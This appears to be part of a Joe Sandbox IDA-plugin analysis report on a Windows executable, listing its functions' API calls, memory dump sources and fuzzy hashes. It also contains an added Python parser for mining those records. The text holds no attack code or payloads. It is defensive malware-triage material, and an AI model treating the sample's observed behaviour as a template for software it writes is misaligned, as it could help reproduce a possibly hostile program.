                                                                              • API String ID: 2649214853-0
                                                                              • Opcode ID: e029a571d7ea910feaf489f47ebd39d374a0288316229fc386b1e2e4e1e2ac40
                                                                              • Instruction ID: 52cd92918bf59317d76ec0dbded9268cc5ddbf6ebeab8dbad6023b52803fe890
                                                                              • Opcode Fuzzy Hash: e029a571d7ea910feaf489f47ebd39d374a0288316229fc386b1e2e4e1e2ac40
                                                                              • Instruction Fuzzy Hash: 045196746001108BC710FF26D981A9B37E9EB58308B90C67BA4089B3A7CB7CDD46CB9D
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                              • String ID:
                                                                              • API String ID: 296031713-0
                                                                              • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                              • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                              • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                              • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                              • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                              • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                              • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                              APIs
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                              • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseEnum
                                                                              • String ID:
                                                                              • API String ID: 2818636725-0
                                                                              • Opcode ID: 4ba9105902ea8f19abce0b58cfd6361b4b3e39fae621ffe28cce2eb109bf1346
                                                                              • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                              • Opcode Fuzzy Hash: 4ba9105902ea8f19abce0b58cfd6361b4b3e39fae621ffe28cce2eb109bf1346
                                                                              • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,?,004580C8,00000000,004580B0,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,004580C8,00000000,004580B0,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 2919029540-0
                                                                              • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                              • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                              • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                              • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                              • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFree
                                                                              • String ID:
                                                                              • API String ID: 4097029671-0
                                                                              • Opcode ID: 724046dbf40c25189cee710f776ecaa222692b14a71540f68148777f5d1b7dbd
                                                                              • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                              • Opcode Fuzzy Hash: 724046dbf40c25189cee710f776ecaa222692b14a71540f68148777f5d1b7dbd
                                                                              • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                              • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CurrentEnumWindows
                                                                              • String ID:
                                                                              • API String ID: 2396873506-0
                                                                              • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                              • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                              • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                              • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                              APIs
                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastMove
                                                                              • String ID:
                                                                              • API String ID: 55378915-0
                                                                              • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                              • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                              • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                              • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              • Opcode ID: 6f9ba9aa6754c9e5f92aa980ec9340f602ab7068810135e8d813bbe39961caa9
                                                                              • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                              • Opcode Fuzzy Hash: 6f9ba9aa6754c9e5f92aa980ec9340f602ab7068810135e8d813bbe39961caa9
                                                                              • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
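The function records in this report follow one fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), which makes them easy to mine in bulk during triage, for example to pull every registry key the sample opens (here HKLM\System\CurrentControlSet\Control\Windows) or to list each function's own API calls keyed by its Opcode ID. The parser below is an added example written for this page, not code from the Joe Sandbox report or from its IDA plugin. Its sample input is three records copied from the section above; the hive-constant table, the regular expressions that describe the record layout, and the field names it emits (api, module, args, subcall, ref) are the example's own assumptions.

```python
"""Parse Joe Sandbox IDA-plugin function records (the per-function blocks
above: APIs / Strings / Memory Dump Source / Similarity) into dicts so API
calls, referenced strings and fuzzy hashes can be queried in bulk.
Added example for this page; not code from the Joe Sandbox report."""
import re
from collections import defaultdict

# Headers that open a field inside one record ("APIs" also opens a record).
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "• RegOpenKeyExA.ADVAPI32(80000002,System\...,00000000), ref: 0042DE38"
# "• Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B"
# "• GetCurrentThreadId.KERNEL32 ref: 0041EEF3"   (no argument list at all)
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
# "• System\CurrentControlSet\Control\Windows, xrefs: 0042DE36"
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs?: (?P<ref>[0-9A-F]{8})$")
# "• API ID: Open", "• Opcode ID: a11f37..."
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Assumed mapping of the first RegOpenKeyEx* argument to a hive name.
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM",
         "80000003": "HKU"}


def parse_records(text):
    """Return one dict per function record; a record starts at an 'APIs' line."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            rec = {"apis": [], "strings": [], "similarity": {}}
            records.append(rec)
            section = "APIs"
        elif line in SECTION_HEADERS:
            section = line
        elif rec is None:
            continue                      # text before the first record
        elif section == "APIs" and (m := API_RE.match(line)):
            rec["apis"].append({
                "api": m["api"], "module": m["mod"], "ref": m["ref"],
                "args": m["args"].split(",") if m["args"] else [],
                "subcall": m["sub"],      # None for the function's own calls
            })
        elif section == "Strings" and (m := STRING_RE.match(line)):
            rec["strings"].append({"text": m["text"], "ref": m["ref"]})
        elif section == "Similarity" and (m := KV_RE.match(line)):
            rec["similarity"][m["key"].strip()] = m["val"].strip()
    return records


def registry_paths(records):
    """Full key paths from RegOpenKeyEx*/RegCreateKeyEx* calls (hive + arg 2)."""
    found = set()
    for rec in records:
        for call in rec["apis"]:
            if call["api"].startswith(("RegOpenKeyEx", "RegCreateKeyEx")) \
                    and len(call["args"]) >= 2:
                hive = HIVES.get(call["args"][0].upper(), call["args"][0])
                found.add(hive + "\\" + call["args"][1])
    return found


def direct_apis(records):
    """Opcode ID -> set of APIs the function itself calls; sub-call lines
    are dropped because they belong to the callee, not to this function."""
    out = defaultdict(set)
    for rec in records:
        oid = rec["similarity"].get("Opcode ID", "?")
        out[oid].update(c["api"] for c in rec["apis"] if c["subcall"] is None)
    return dict(out)


# Constructed sample: three records copied from the report section above,
# trimmed to the fields this parser uses.
SAMPLE = r"""
APIs
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
Strings
• System\CurrentControlSet\Control\Windows, xrefs: 0042DE36
Similarity
• API ID: Open
• Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
APIs
• GetACP.KERNEL32(?,?,00000001,00000000,0047E237,?,-0000001A,004800ED,-00000010,?,00000004,0000001B,00000000,0048043A,?,0045D9B8), ref: 0047DFCE
  • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
• SendNotifyMessageA.USER32(0002042A,00000496,00002711,-00000001), ref: 0047E19E
Similarity
• API ID: EnumFontsMessageNotifyReleaseSend
• Opcode ID: e029a571d7ea910feaf489f47ebd39d374a0288316229fc386b1e2e4e1e2ac40
APIs
• GetCurrentThreadId.KERNEL32 ref: 0041EEF3
• EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
Similarity
• API ID: Thread$CurrentEnumWindows
• Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(sorted(registry_paths(recs)))
    for oid, apis in direct_apis(recs).items():
        print(oid[:16], sorted(apis))
```

Run it against the full text of a report section (paste the records into SAMPLE or read them from a file) to get the set of registry keys touched and a per-function API list; the Opcode ID keys can then be matched against other reports to find the same function in related samples.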
                                                                              APIs
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                              • LoadCursorA.USER32(00000000,00000000), ref: 00423273
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: CursorLoad
• String ID:
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E39E
• LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
APIs
• SHGetKnownFolderPath.SHELL32(00499D2C,00008000,00000000,?), ref: 0047C38B
• CoTaskMemFree.OLE32(?,0047C3CE), ref: 0047C3C1
Similarity
• API ID: FolderFreeKnownPathTask
• String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046FFBD,?,00000000), ref: 0045090E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046FFBD,?,00000000), ref: 00450916
  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,0049799C,00000001,00000000,00000002,00000000,00497AFD,?,?,00000005,00000000,00497B31), ref: 004506B7
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
APIs
Similarity
• API ID: Global$AllocLock
• String ID:
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Similarity
• API ID: Virtual$AllocFree
• String ID:
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
  • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
Similarity
• API ID: InfoScroll
• String ID:
APIs
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C322,?,00000000,?,?,0046C534,?,00000000,0046C5A8), ref: 0046C306
  • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
  • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
Similarity
• API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
• String ID:
APIs
Similarity
• API ID: FileWrite
• String ID:
APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
Similarity
• API ID: CreateWindow
• String ID:
APIs
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
• Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
• Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
• Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
• Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
• Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
• Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
• Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
• Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
• Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
• Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
APIs
• GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: ExtentPointText
• String ID:
• API String ID: 566491939-0
